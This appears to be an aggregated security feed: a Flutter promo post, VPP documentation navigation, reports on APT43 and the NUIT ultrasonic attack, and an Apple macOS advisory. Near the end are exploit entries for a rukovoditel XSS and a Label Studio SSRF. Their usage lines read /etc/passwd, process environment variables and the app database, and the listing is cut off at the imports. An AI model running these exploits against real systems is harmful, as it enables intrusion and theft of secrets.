By Owais Sultan
Today’s mobile-first world calls for functional solutions that meet the expectations of smartphone users. Creating a user-friendly mobile…
This is a post from HackRead.com Read the original post: Top Benefits of Using Flutter for Cross-Platform App Development

Today’s mobile-first world calls for functional solutions that meet the expectations of smartphone users. Creating a user-friendly mobile application is a good strategy for driving your business growth and boosting profits. However, with multiple platforms and devices available, it can be challenging to develop an application that works smoothly across all of them. This is where Flutter comes in handy.

**What is Flutter?**

Flutter is a cross-platform framework that enables you to reach your customers across a variety of platforms at once. In other words, you can create a single source code that is reused across different operating systems, including the absolute mobile market leaders – Android and iOS.

If your target audience is dispersed among various platforms, Flutter can be a real game-changer for your business. However, this technology has plenty of other advantages as well.

**The benefits of the Flutter framework**

Using flutter app development services can save a great deal of time and money. Instead of two teams working on separate codebases for different platforms, you just need one.

The development efficiency does not affect the quality of the delivered software, though. Flutter’s complete SDK and rich functionality allow for the creation of high-performance and visually appealing software that offers a native-like experience. Let’s have a look at its benefits.

**High performance**

Performance is a top priority in a mobile app because it directly affects the user experience. Freezes, bugs, or skipped frames can frustrate your customers and discourage them from using your app ever again. Fortunately, Flutter apps process 60 frames per second, which enables fast and smooth operations.

**Hot reload**

What sets Flutter apart from other technologies? There may be more than one thing, but the Hot Reload function really stands out.

This feature allows developers and designers to see introduced changes on the fly. So, instead of writing a piece of code and waiting for it to be compiled and loaded, they can see the effects immediately in the Dart Virtual Machine. This is a great tool for improving development efficiency.

**Customizable widgets**

A wide array of widgets available in Flutter’s libraries makes designing an eye-catching and responsive UI a piece of cake. Developers can mix pre-built widgets or customize them to create one-of-a-kind designs that look and feel like native ones.

Furthermore, Flutter’s elements are performance-optimized, so the UI is consistently responsive, even on less advanced devices.

Flutter is an enormously popular open-source framework continuously supported by its founder – Google. Regular boosts of new updates and bug fixes encourage developers to employ Flutter on a daily basis. This builds a developer community ready to share their tips and tricks to foster smooth software development. 

**Top-quality experience across multiple platforms**

Taking into consideration its benefits, Flutter is a real breakthrough in app development. It allows you to build a high-quality product in a fraction of the native development time and budget. If you want to make the most of the mobile traffic with the least possible effort and cost, developing a Flutter app is the way to go.

**Watch Google Introducing Flutter**

Owais takes care of Hackread's social media from the very first day. At the same time He is pursuing for chartered accountancy and doing part time freelance writing.

Top Benefits of Using Flutter for Cross-Platform App Development

FP.io VPP (Vector Packet Processor) 22.10, 22.06, 22.02, 21.10, 21.06, 21.01, 20.09, 20.05, 20.01, 19.08, and 19.04 Generates a Predictable IV with CBC Mode.

The Vector Packet Processor

FD.io’s Vector Packet Processor (VPP) is a fast, scalable layer 2-4 multi-platform network stack. It runs in Linux Userspace on multiple architectures including x86, ARM, and Power architectures.

VPP’s high performance network stack is quickly becoming the network stack of choice for applications around the world.

VPP is continually being enhanced through the extensive use of plugins. The Data Plane Development Kit (DPDK) is a great example of this. It provides some important features and drivers for VPP.

VPP supports integration with OpenStack and Kubernetes. Network management features include configuration, counters, sampling and more. For developers, VPP includes high-performance event-logging, and multiple kinds of packet tracing. Development debug images include complete symbol tables, and extensive consistency checking.

Some VPP Use-cases include vSwitches, vRouters, Gateways, Firewalls and Load-Balancers, to name a few.

For more details click on the links below or press next.

About VPP

*   Scalar vs Vector packet processing
*   The Packet Processing Graph
*   Network Stack Features
*   Host Stack
*   Additional features
*   Supported archs and OS
*   Performance
*   Release notes
*   VPP Supported Features

Use Cases

*   VPP with Containers
*   VPP with Iperf3 and TRex
*   VPP in the Cloud
*   VPP with Virtual Machines
*   VPP with VMware/Vmxnet3
*   VPP as a Home Gateway
*   Access Control Lists with VPP
*   Generating traffic with VPP
*   Web applications with VPP
*   Simulating networks with VPP
*   Stateless Traffic Gen with VPP
*   IKEv2 with VPP
*   VPP in kubernetes (Contiv/Deprecated)
*   VPP Container Test Bench

Getting started

*   Downloading and Installing VPP
    *   Installing on Ubuntu / Debian OS Distros
    *   Package Descriptions
*   Running VPP
    *   Usergroup
    *   Systemd File vpp.service
    *   Huge Pages
*   Progressive VPP Tutorial
    *   Setting up your environment
    *   Running VPP
    *   Creating an Interface
    *   Using the trace command
    *   Connecting Two FD.io VPP Instances
    *   Routing
    *   Switching
*   Troubleshooting
    *   CPU Load/Usage
    *   Google Sanitizers
    *   Memory leaks

Developer Documentation

*   Build, Run & Debug
    *   Building VPP
    *   Running VPP
    *   Testing VPP
    *   GDB Examples
    *   Cross compilation on MacOS
*   Core Architecture
    *   Software Architecture
    *   VPPINFRA (Infrastructure)
    *   VLIB (Vector Processing Library)
    *   VNET (VPP Network Stack)
    *   Feature Arcs
    *   Buffer Metadata
    *   Multi-architecture support
    *   Bounded-index Extensible Hashing (bihash)
    *   Build System
    *   VPP mem preload
    *   Multi-threading in VPP
*   Core Features
    *   The FIB
    *   Segment routing
    *   Punting Packets
    *   IPSec (IP Security)
    *   BFD module
    *   IP Reassembly
    *   IPFIX support
    *   Switched Port Analyzer
    *   MTU in VPP
    *   Generic Segmentation Offload
    *   Syslog protocol support
    *   Event-logger
    *   Statistics
    *   SELinux - VPP Custom SELinux Policy
    *   Policing
*   Adding a new plugin or feature
    *   Adding a plugin
    *   Sample plugin for VPP
    *   Handoff queue in a plugin
*   Plugins
    *   QUIC HostStack
    *   Cloud NAT
    *   Linux Control Plane Integration
    *   SRv6 Plugins
    *   Marvell device plugin
    *   LLDP Protocol
    *   Stateful NAT64
    *   Active-Passive NAT HA
    *   NAT44-ED: NAT44 Endpoint Dependent
    *   PNAT 1:1 match & rewrite NAT
    *   Load Balancer plugin
    *   LACP Protocol
    *   IPFIX flow record plugin
    *   MAP and Lw4o6
    *   Buffer metadata change tracker
    *   DHCPv6 prefix delegation
    *   Inband OAM (iOAM)
    *   Wireguard vpp-plugin
    *   SRTP Protocol
    *   Multicore support for ACL plugin
    *   ACL plugin constant-time lookup
    *   ACL Lookup contexts
    *   Buffers monitoring plugin
*   Device drivers
    *   Intel AVF device driver
    *   RDMA (ibverb) device driver
    *   VMWARE vmxnet3 device driver
    *   AF\_XDP device driver
*   VPP Test Framework
    *   Overview
    *   Anatomy of a test case
    *   Logging
    *   Parallel test execution
    *   Test temporary directory and VPP life cycle
    *   Virtual environment
    *   Naming conventions
    *   Automatically generated addresses
    *   Packet flow in the VPP Test Framework
    *   Test framework objects
    *   How VPP APIs/CLIs are called
    *   Utility methods
    *   Example: how to add a new test
*   VPP extra tools
    *   Code coverage with lcov
    *   VPP Snap Build
    *   Strongswan Testing Tool
    *   VPP configuration utility
    *   VPP interface stats client
    *   VPP stats segment FUSE filesystem
    *   VPP Top Installation
    *   LD\_PRELOAD the VCL
    *   Host stack test framework

Interfacing with VPP

*   The binary API
    *   VPP API module
    *   VPP API Language
    *   Writing API handlers
*   C api client
*   C++ api client
*   Go api (govpp)
    *   Components involved
    *   Getting started
    *   Launch VPP
    *   Connecting to VPP
*   Rust api client
*   Memif library (libmemif)
    *   Shared Memory Packet Interface (memif) Library
    *   Build Instructions
    *   Getting started
    *   Libmemif Examples

Contributing

*   Getting a Patch Reviewed
    *   Setup
    *   Clone with ssh
    *   Git Review
*   Writing VPP Documentation
    *   Building the docs
    *   View the results
    *   Writing Docs and merging
*   Reporting Bugs
    *   Data to include in bug reports
    *   Capturing post-mortem data
    *   Core files from Private Images

Debug CLI

*   Getting Started with the debug CLI
    *   Debug and Telnet CLI
    *   CLI features
*   Interface Commands
    *   Basic Interface Commands
    *   Hardware-Interfaces Commands
    *   Create Interfaces Commands
    *   Set Interface Commands
*   Reference
    *   ARP and Loopback CLI
    *   Circular Journal
    *   Command line session
    *   DPDK Crypto
    *   DPDK and pcap tx
    *   Host Interface
    *   Image Version Information
    *   Init functions
    *   Interface
    *   Layer 2 CLI
    *   Layer 3 IP CLI
    *   Network Delay Simulator
    *   Static HTTP Server
    *   Unix Interface
    *   VLIB application library
    *   VXLAN CLI
    *   VXLAN-GBP CLI
    *   Perfmon cli reference
    *   Gbp cli reference
    *   L2e cli reference
    *   netmap
    *   Abf cli reference
    *   Acl cli reference
    *   Adl cli reference
    *   Af\_xdp cli reference
    *   Arping cli reference
    *   Avf cli reference
    *   Bufmon cli reference
    *   Builtinurl cli reference
    *   Cdp cli reference
    *   Cnat cli reference
    *   Crypto\_sw\_scheduler cli reference
    *   Ct6 cli reference
    *   Dhcp cli reference
    *   Dispatch-trace cli reference
    *   Dns cli reference
    *   Cryptodev cli reference
    *   Flowprobe cli reference
    *   Geneve cli reference
    *   Gtpu cli reference
    *   Hs\_apps cli reference
    *   Igmp cli reference
    *   Ikev2 cli reference
    *   Ila cli reference
    *   Ip6 cli reference
    *   Encap cli reference
    *   Export cli reference
    *   Export-vxlan-gpe cli reference
    *   Ip6 cli reference
    *   Lib-pot cli reference
    *   Lib-trace cli reference
    *   Lib-vxlan-gpe cli reference
    *   Udp-ping cli reference
    *   L2tp cli reference
    *   L3xc cli reference
    *   Lacp cli reference
    *   Lb cli reference
    *   Linux-cp cli reference
    *   Test cli reference
    *   Lisp-cp cli reference
    *   Lisp-gpe cli reference
    *   Test cli reference
    *   Lldp cli reference
    *   Mactime cli reference
    *   Map cli reference
    *   Pp2 cli reference
    *   Mdata cli reference
    *   Memif cli reference
    *   Mss\_clamp cli reference
    *   Det44 cli reference
    *   Dslite cli reference
    *   Nat44-ed cli reference
    *   Nat44-ei cli reference
    *   Nat64 cli reference
    *   Nat66 cli reference
    *   Pnat cli reference
    *   Nsh cli reference
    *   Nsh-md2-ioam cli reference
    *   Export-nsh-md2-ioam cli reference
    *   Oddbuf cli reference
    *   Perfmon cli reference
    *   Ping cli reference
    *   Pppoe cli reference
    *   Prom cli reference
    *   Quic cli reference
    *   Rdma cli reference
    *   Snort cli reference
    *   Stn cli reference
    *   Svs cli reference
    *   Tlsopenssl cli reference
    *   Tracedump cli reference
    *   Unittest cli reference
    *   Urpf cli reference
    *   Vhost cli reference
    *   Vmxnet3 cli reference
    *   Vrrp cli reference
    *   Wireguard cli reference
    *   Dma cli reference
    *   Pci cli reference
    *   Stats cli reference
    *   Vlibapi cli reference
    *   Vlibmemory cli reference
    *   Adj cli reference
    *   Arp cli reference
    *   Bfd cli reference
    *   Bier cli reference
    *   Bonding cli reference
    *   Classify cli reference
    *   Crypto cli reference
    *   Pipe cli reference
    *   Tap cli reference
    *   Dpo cli reference
    *   Feature cli reference
    *   Fib cli reference
    *   Flow cli reference
    *   Gre cli reference
    *   Gso cli reference
    *   Hash cli reference
    *   Interface cli reference
    *   Ip-neighbor cli reference
    *   Reass cli reference
    *   Ip6-nd cli reference
    *   Ipfix-export cli reference
    *   Ipip cli reference
    *   Ipsec cli reference
    *   Lawful-intercept cli reference
    *   Mfib cli reference
    *   Mpls cli reference
    *   Pg cli reference
    *   Policer cli reference
    *   Qos cli reference
    *   Session cli reference
    *   Span cli reference
    *   Srmpls cli reference
    *   Srv6 cli reference
    *   Syslog cli reference
    *   Tcp cli reference
    *   Teib cli reference
    *   Udp cli reference
    *   Unix cli reference
    *   Vxlan-gpe cli reference
    *   Api cli reference
    *   App cli reference
    *   Vnet cli reference
    *   vHost User

Configuration file

*   Getting started with the configuration
    *   Command-line Arguments
    *   Configuration File (startup.conf)
*   Configuration Reference
    *   The unix section
    *   The api-trace Section
    *   The api-segment Section
    *   The socksvr Section
    *   The cpu Section
    *   The buffers Section
    *   The dpdk Section
    *   The plugins Section
    *   Some Advanced Parameters:
    *   acl-plugin Section
    *   api-queue Section
    *   cj Section
    *   dns Section
    *   ethernet Section
    *   heapsize Section
    *   ip Section
    *   ip6 Section
    *   l2learn Section
    *   l2tp Section
    *   logging Section
    *   mactime Section
    *   “map” Parameters
    *   nat Section
    *   oam Section
    *   physmem Section
    *   tapcli Section
    *   tcp Section
    *   tls Section
    *   tuntap Section
    *   vhost-user Section
    *   vlib Section

About this documentation

VPP Version : 23.02\-release
Built on    : 02 March 2023

CVE-2022-46397: What is the Vector Packet Processor (VPP) — The Vector Packet Processor v23.02-0-g5516fc0f3 documentation

In cyberattacks against the US, South Korea, and Japan, the group (aka APT43 or Thallium) is using advanced social engineering and cryptomining tactics that set it apart from other threat actors.

Cybercriminal group Kimsuky has evolved into a full-fledged, persistent threat, carrying out "unusually aggressive" social-engineering attacks aimed at gathering intelligence, and stealing and laundering cryptocurrency to support the North Korean government.

Researchers from Mandiant have tracked a number of changes to the activity of the group, which they call APT43, in a series of rapid-fire attacks against targets in the US, South Korea, and Japan, they revealed in a report published today.

Kimsuky, also tracked as Thallium, has been on various researchers' radar screens since 2018, and its previous activity has been widely reported. In earlier attacks, the group mainly focused on conducting cyber espionage against research institutions, geo-political think tanks, and — particularly during the height of the pandemic — pharmaceutical companies.

The group typically used spear-phishing campaigns to lure in users and then installed various public and non-public malware, including spyware, onto targeted devices, which were often Android-based smartphones. In fact, Kimsuky was identified as recently as earlier this month leveraging malicious Chrome browser extensions and Android app-store services to target individuals conducting research on the inter-Korean conflict.

Now, however, Mandiant researchers have found that APT43 is evolving in several ways.

**New Financial & Social Tactics**

For one, the group is now following in the shoes of other North Korean APTs and branching out beyond mere cyber espionage to steal cryptocurrency, the researchers have found. In addition to using the ill-gotten currency to fund the regime of Kim Jong-un, as other groups do, APT43 also uses it to bolster its own activities, they said.

The group is even going the extra step of laundering the crypto through legitimate cloud-mining services so it comes out as clean currency and is difficult to track — an activity that might be used by other groups, but has flown under the radar until now, the researchers said.

"The washing of funds and the 'how' has been the missing piece of the equation," notes Michael Barnhart, Mandiant principal analyst at Google Cloud. "We have indications that APT43 utilizes specific hash rental services to launder these funds by mining for different cryptocurrencies."

For a small fee, these services provide hash power, which APT43 uses to mine cryptocurrency to a wallet selected by the buyer without any blockchain-based association to the buyer's original payments. This allows the APT to use stolen funds to mine for a different cryptocurrency, the researchers said. By spending very little, threat actors walk away with untracked, clean currency to do as they wish, Barnhart explains.

Moreover, APT43 — while technologically unsophisticated — relies on advanced and persistent social-engineering tactics in which threat actors create convincing fake personas and exhibit patience in building relationships with targets over several weeks without using malware, the researchers said.

"I've never seen an APT quite as successful with such novel techniques," Barnhart notes. "They pretend to be subject-matter experts or reporters and ask targeted questions — often with the promise of quoting the victim in a report or news article — and successfully gain feedback."

Indeed, in some instances, attackers successfully convinced targeted victims to send over proprietary, geopolitical analysis and research without deploying malware at all, the researchers said.

This deviates from standard procedure for most threat groups, allowing APT43 to expend little effort or resources in building malware and gaining the information they are seeking in a low-fi way — by merely asking victims for it, Barnhart notes.

**High Volume Cyberattacks, Shifting Targets**

APT43 has shifted its targets, and the malware it uses, in campaigns over the years in response to the demands of the North Korean government and the cyberespionage activities it requires of the group, according to Mandiant.

"APT43 ultimately modifies its targeting and tactics, techniques, and procedures (TTPs) to suit its sponsors, including carrying out financially-motivated cybercrime as needed to support the regime," the researchers said in the report.

For example, prior to October 2020, the group primarily targeted US and South Korean government offices, diplomatic organizations, and think tank-related entities with a stake in foreign policy and security issues affecting the Korean peninsula. Over the next year, however, the group shifted its focus to COVID-19 response efforts in North Korea by targeting health-related verticals and pharmaceutical companies in South Korea, the US, Europe, and Japan.

One notable difference that has emerged between the group and other North Korean threat actors is a recent shift to expand, targeting "everyday users" based on "the sheer velocity and volume of attacks," says Joe Dobson, Mandiant principal analyst.

"By spreading their attack out across hundreds, if not thousands, of victims, their activity becomes less noticeable and harder to track than hitting one large target," he says. "Their pace of execution, combined with their success rate, is alarming."

APT43 is aiming its high-volume activity at entities and organizations in government, business services, and manufacturing as well as think tanks and organizations in education and research related to geopolitical and nuclear policy in the US, South Korea, and Japan, the researchers said.

Given its advanced social-engineering tactics and tendency to go after both specific individuals and wider-net targets, researchers advised organizations that may be at risk to share with their employees "a greater understanding of cyber hygiene and heightened awareness," Barnhart says. "It's important to make personnel aware of this threat actor's TTPs," Barnhart says.

He adds that the APT's spoofed emails are highly convincing, which makes them difficult to spot, even for savvy users; thus, organizations at risk should be on high alert.

North Korea's Kimsuky Evolves into Full-Fledged, Prolific APT43

A technique, dubbed the "Near-Ultrasound Inaudible Trojan" (NUIT), allows an attacker to exploit smartphones and smart speakers over the Internet, using sounds undetectable by humans.

The sensitivity of voice-controlled microphones could allow cyberattackers to issue commands to smartphones, smart speakers, and other connected devices using near-ultrasound frequencies undetectable by humans for a variety of nefarious outcomes — including taking over apps that control home Internet of Things (IoT) devices.

The technique, dubbed a Near-Ultrasound Inaudible Trojan (NUIT), exploits voice assistants like Siri, Google Assistant, or Alexa and the ability of many smart devices to be controlled by sound. According to researchers at the University of Texas at San Antonio (UTSA) and the University of Colorado at Colorado Springs (UCCS), most devices are so sensitive that they can pick up voice commands even if the sounds are not in the normal frequency range of human voices. 

In a series of videos posted online, the researchers demonstrated attacks on a variety of devices, including iOS and Android smartphones, Google Home and Amazon Echo smart speakers, and Windows Cortana. 

In one scenario, a user might be browsing a website that is playing NUIT attack commands in the background. The victim might have a mobile phone with voice control enabled in close proximity. The first command issued by the attacker might be to turn down the assistant's volume so that responses are harder to hear, and thus less likely to be noticed. After that, subsequent commands could ask the assistant to use a smart-door app to unlock the front door let's say. In less concerning scenarios, commands could cause an Amazon Alexa device to start playing music or give a weather report.

The attack works broadly, but the specifics vary per device.

"This is not only a software issue or malware," said Guenevere Chen, an associate professor in the UTSA Department of Electrical and Computer Engineering, in a statement. "It's a hardware attack that uses the internet. The vulnerability is the nonlinearity of the microphone design, which the manufacturer would need to address."

    

Using inaudible sounds played through a speaker, an attacker can issue commands to smart devices. Source: UTSA and UCCS

Attacks using a variety of audible and non-audible frequencies have a long history in the hacking world. In 2005, for example, a group of researchers at the University of California, Berkeley, found that they could recover nearly all of the English characters typed during a 10-minute sound recording, and that 80% of 10-character passwords could be recovered within the first 75 guesses. In 2019, researchers from Southern Methodist University used smartphone microphones to record audio of a user typing in a noisy room, recovering 42% of keystrokes.

The latest research appears to use the same techniques as a 2017 paper from researchers at Zhejiang University, which used ultrasonic signals to attack popular voice-activated smart speakers and devices. In the attack, dubbed the DolphinAttack, researchers modulated voice commands on an ultrasonic carrier signal, making them inaudible. Unlike the current attack, however, the DolphinAttack used a bespoke hardwired system to generate the sounds rather than using connected devices with speakers to issue commands.

**Defenses Against NUIT Cyberattacks**

The latest attack allows any device compatible with audio commands to be used as a conduit for malicious activity. Android phones could be attacked through inaudible signals playing in a YouTube video on a smart TV, for instance. iPhones could be attacked through music playing from a smart speaker and vice versa.

In most cases, the inaudible "voice" does not even need to have to be recognizable as the authorized user, said UTSA's Chen in a recent statement announcing the research.

"Out of the 17 smart devices we tested, \[attackers targeting\] Apple Siri devices need to steal the user's voice, while other voice assistant devices can get activated by using any voice or a robot voice," she said. "It can even happen in Zoom during meetings. If someone unmutes themselves, they can embed the attack signal to hack your phone that's placed next to your computer during the meeting."

However, the receiving speaker has to be turned up fairly loud for an attack to work, while the length of the malicious commands has to be less than 0.77 seconds, which can help mitigate drive-by attacks. And devices that are hooked into earbuds and headsets are less likely to be vulnerable to being used by an attacker, according to Chen.

"If you don't use the speaker to broadcast sound, you're less likely to get attacked by NUIT," she said. "Using earphones sets a limitation where the sound from earphones is too low to transmit to the microphone. If the microphone cannot receive the inaudible malicious command, the underlying voice assistant can't be maliciously activated by NUIT."

The technique is demonstrated in dozens of videos posted online by the researchers, who did not respond to a request for comment before publication.

Hey, Siri: Hackers Can Control Smart Devices Using Inaudible Sounds

rukovoditel version 3.2.1 suffers from a cross site scripting vulnerability.

    ## Title: rukovoditel 3.2.1 - Cross-Site Scripting (XSS)## Author: nu11secur1ty## Date: 11.03.2022## Vendor: https://www.rukovoditel.net/## Software: https://sourceforge.net/projects/rukovoditel/files/rukovoditel_3.2.1.zip/download## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/rukovoditel.net/2022/rukovoditel-3.2.1## Description:The application is vulnerable to DOM-based cross-site scriptingattacks. Data is read from `location.hash` and passed to`jQuery.parseHTML`.The attacker can use this vulnerability to create an unlimited numberof accounts on this system until it crashed.## STATUS: HIGH Vulnerability - CRITICAL[+] Payload:```POSTGET /rukovoditel/index.php?module=users/restore_password HTTP/1.1Host: pwnedhost.comAccept-Encoding: gzip, deflateAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en-US;q=0.9,en;q=0.8User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.63Safari/537.36Connection: closeCache-Control: max-age=0Cookie: sid=jf2mf72r2kfakhhnn6evgusrcg;cookie_test=please_accept_for_session;app_login_redirect_to=module%3Ddashboard%2FUpgrade-Insecure-Requests: 1Referer: http://pwnedhost.com/rukovoditel/index.php?module=users/loginSec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="107", "Chromium";v="107"Sec-CH-UA-Platform: WindowsSec-CH-UA-Mobile: ?0```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/rukovoditel.net/2022/rukovoditel-3.2.1)## Proof and Exploit:[href](https://streamable.com/i1qmfk)## Time spent`3:45`

rukovoditel 3.2.1 Cross Site Scripting

Apple Security Advisory 2023-03-27-5 - macOS Big Sur 11.7.5 addresses bypass, code execution, integer overflow, out of bounds read, out of bounds write, and use-after-free vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

APPLE-SA-2023-03-27-5 macOS Big Sur 11.7.5

macOS Big Sur 11.7.5 addresses the following issues.  
Information about the security content is also available at  
https://support.apple.com/HT213675.

Apple Neural Engine  
Available for: macOS Big Sur  
Impact: An app may be able to execute arbitrary code with kernel  
privileges  
Description: The issue was addressed with improved memory handling.  
CVE-2023-23540: Mohamed GHANNAM (@_simo36)

AppleAVD  
Available for: macOS Big Sur  
Impact: An application may be able to execute arbitrary code with  
kernel privileges  
Description: A use after free issue was addressed with improved  
memory management.  
CVE-2022-26702: an anonymous researcher, Antonio Zekic  
(@antoniozekic), and John Aakerblom (@jaakerblom)

AppleMobileFileIntegrity  
Available for: macOS Big Sur  
Impact: A user may gain access to protected parts of the file system  
Description: The issue was addressed with improved checks.  
CVE-2023-23527: Mickey Jin (@patch1t)

Archive Utility  
Available for: macOS Big Sur  
Impact: An archive may be able to bypass Gatekeeper  
Description: The issue was addressed with improved checks.  
CVE-2023-27951: Brandon Dalton of Red Canary and Csaba Fitzl  
(@theevilbit) of Offensive Security

Calendar  
Available for: macOS Big Sur  
Impact: Importing a maliciously crafted calendar invitation may  
exfiltrate user information  
Description: Multiple validation issues were addressed with improved  
input sanitization.  
CVE-2023-27961: Rıza Sabuncu (@rizasabuncu)

Carbon Core  
Available for: macOS Big Sur  
Impact: Processing a maliciously crafted image may result in  
disclosure of process memory  
Description: The issue was addressed with improved checks.  
CVE-2023-23534: Mickey Jin (@patch1t)

ColorSync  
Available for: macOS Big Sur  
Impact: An app may be able to read arbitrary files  
Description: The issue was addressed with improved checks.  
CVE-2023-27955: JeongOhKyea

CommCenter  
Available for: macOS Big Sur  
Impact: An app may be able to cause unexpected system termination or  
write kernel memory  
Description: An out-of-bounds write issue was addressed with improved  
input validation.  
CVE-2023-27936: Tingting Yin of Tsinghua University

dcerpc  
Available for: macOS Big Sur  
Impact: A remote user may be able to cause unexpected app termination  
or arbitrary code execution  
Description: The issue was addressed with improved bounds checks.  
CVE-2023-27935: Aleksandar Nikolic of Cisco Talos

dcerpc  
Available for: macOS Big Sur  
Impact: A remote user may be able to cause unexpected system  
termination or corrupt kernel memory  
Description: The issue was addressed with improved memory handling.  
CVE-2023-27953: Aleksandar Nikolic of Cisco Talos  
CVE-2023-27958: Aleksandar Nikolic of Cisco Talos

Find My  
Available for: macOS Big Sur  
Impact: An app may be able to read sensitive location information  
Description: A privacy issue was addressed with improved private data  
redaction for log entries.  
CVE-2023-23537: an anonymous researcher

Foundation  
Available for: macOS Big Sur  
Impact: Parsing a maliciously crafted plist may lead to an unexpected  
app termination or arbitrary code execution  
Description: An integer overflow was addressed with improved input  
validation.  
CVE-2023-27937: an anonymous researcher

Identity Services  
Available for: macOS Big Sur  
Impact: An app may be able to access information about a user’s  
contacts  
Description: A privacy issue was addressed with improved private data  
redaction for log entries.  
CVE-2023-27928: Csaba Fitzl (@theevilbit) of Offensive Security

ImageIO  
Available for: macOS Big Sur  
Impact: Processing a maliciously crafted file may lead to unexpected  
app termination or arbitrary code execution  
Description: An out-of-bounds read was addressed with improved bounds  
checking.  
CVE-2023-27946: Mickey Jin (@patch1t)

ImageIO  
Available for: macOS Big Sur  
Impact: Processing a maliciously crafted image may result in  
disclosure of process memory  
Description: The issue was addressed with improved memory handling.  
CVE-2023-23535: ryuzaki

Kernel  
Available for: macOS Big Sur  
Impact: An app may be able to execute arbitrary code with kernel  
privileges  
Description: A use after free issue was addressed with improved  
memory management.  
CVE-2023-23514: Xinru Chi of Pangu Lab and Ned Williamson of Google  
Project Zero

Kernel  
Available for: macOS Big Sur  
Impact: An app may be able to disclose kernel memory  
Description: A validation issue was addressed with improved input  
sanitization.  
CVE-2023-28200: Arsenii Kostromin (0x3c3e)

NetworkExtension  
Available for: macOS Big Sur  
Impact: A user in a privileged network position may be able to spoof  
a VPN server that is configured with EAP-only authentication on a  
device  
Description: The issue was addressed with improved authentication.  
CVE-2023-28182: Zhuowei Zhang

PackageKit  
Available for: macOS Big Sur  
Impact: An app may be able to modify protected parts of the file  
system  
Description: A logic issue was addressed with improved checks.  
CVE-2023-27962: Mickey Jin (@patch1t)

System Settings  
Available for: macOS Big Sur  
Impact: An app may be able to access user-sensitive data  
Description: A privacy issue was addressed with improved private data  
redaction for log entries.  
CVE-2023-23542: an anonymous researcher

System Settings  
Available for: macOS Big Sur  
Impact: An app may be able to read sensitive location information  
Description: A permissions issue was addressed with improved  
validation.  
CVE-2023-28192: Guilherme Rambo of Best Buddy Apps (rambo.codes)

Vim  
Available for: macOS Big Sur  
Impact: Multiple issues in Vim  
Description: Multiple issues were addressed by updating to Vim  
version 9.0.1191.  
CVE-2023-0433  
CVE-2023-0512

XPC  
Available for: macOS Big Sur  
Impact: An app may be able to break out of its sandbox  
Description: This issue was addressed with a new entitlement.  
CVE-2023-27944: Mickey Jin (@patch1t)

Additional recognition

Activation Lock  
We would like to acknowledge Christian Mina for their assistance.

AppleMobileFileIntegrity  
We would like to acknowledge Wojciech Reguła (@_r3ggi) of SecuRing  
(wojciechregula.blog) for their assistance.

CoreServices  
We would like to acknowledge Mickey Jin (@patch1t) for their  
assistance.

NSOpenPanel  
We would like to acknowledge Alexandre Colucci (@timacfr) for their  
assistance.

Wi-Fi  
We would like to acknowledge an anonymous researcher for their  
assistance.

macOS Big Sur 11.7.5 may be obtained from the Mac App Store or  
Apple's Software Downloads web site:  
https://support.apple.com/downloads/  
All information is also posted on the Apple Security Updates  
web site: https://support.apple.com/en-us/HT201222.

This message is signed with Apple's Product Security PGP key,  
and details are available at:  
https://www.apple.com/support/security/pgp/  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCAAdFiEEBP+4DupqR5Sgt1DB4RjMIDkeNxkFAmQiHnwACgkQ4RjMIDke  
Nxks0hAAquqDdtX6QvjVigRuSd2bpQny1TxVp62Zo47F9YkrvuvKVvJjaFzQJNjE  
p2Oq3BgNBkUqei26w8GLqwbg8szhCIPCOVHFcGDTPGrf53oWLlPc6WZxn8ihZOo4  
r3rxH4MGFSb+dBwWnF6GVX1EBcVjO08FwOzgNqkh2baqSU0iuxnSRW9XYmzwhG1w  
bj86kfnCooSLJlUTiTbXxN8W/vmfwRWONXQTkkOa47knWSKH9QBzzfAJKbil6sRE  
hDiYdtXUER//PApErvjl5i6b5wRQ0KQ19X//XfZzJtWCPuh0/nw7ducHJg+DpPUc  
EfNINhPKauqUvw516EvDuW0yVIlyMrfNCJOpHwQkmCfqx2i6l1+U5M8yqsyVcpbe  
Nbs6LYMNvDalLnazRRA3oT3036MrnCWem/M1afTrsoHYnhYb8FMx9gI3GV2Swgud  
fJrPttdjtpwlrCF60KsquJEvmcrNFwKk+QKS8Gbe8bbJSPk1AGsHN1JivFNiC036  
fycIK1ffwPHPYJgF6rLCOQ9q+DHRTw+lR0UrGmRplrjVBwt9cdiuLaeJZWPyGMwP  
P5QYlkULAE+5B4HKqzKMFYPkoEMzmvdOsgbhcg7OSmP1PAiAW6m7HnOmDAX7E2El  
03qFLcjb1GxM/U+lKN5Xx4rH+BR0yrEx20oZGX9Vymn7UJVYlDI=  
=xOHM  
-----END PGP SIGNATURE-----

Apple Security Advisory 2023-03-27-5

Label Studio versions 1.5.0 and below suffer from a server-side request forgery vulnerability.

    # Exploit Title: Label Studio 1.5.0 - Authenticated Server Side Request Forgery (SSRF)# Google Dork: intitle:"Label Studio" intext:"Sign Up" intext:"Welcome to Label Studio Community Edition"# Date: 2022-10-03# Exploit Author: @DeveloperNinja, IncisiveSec@protonmail.com# Vendor Homepage: https://github.com/heartexlabs/label-studio, https://labelstud.io/# Software Link: https://github.com/heartexlabs/label-studio/releases# Version: <=1.5.0# CVE : CVE-2022-36551# Docker Container: heartexlabs/label-studio# Server Side Request Forgery (SSRF) in the Data Import module in Heartex - Label Studio Community Edition # versions 1.5.0 and earlier allows an authenticated user to access arbitrary files on the system. # Furthermore, self-registration is enabled by default in these versions of Label Studio enabling a remote # attacker to create a new account and then exploit the SSRF.## This exploit has been tested on Label Studio 1.5.0## Exploit Usage Examples (replace with your target details):# - python3 exploit.py --url http://localhost:8080/ --username "user@example.com" --password 12345678 --register --file /etc/passwd# - python3 exploit.py --url http://localhost:8080/ --username "user@example.com" --password 12345678 --register --file /proc/self/environ# - python3 exploit.py --url http://localhost:8080/ --username "user@example.com" --password 12345678 --register --file /label-studio/data/label_studio.sqlite3 --out label_studio.sqlite3.sqlite3import jsonimport argparseimport requestsimport shutil                    from urllib.parse import 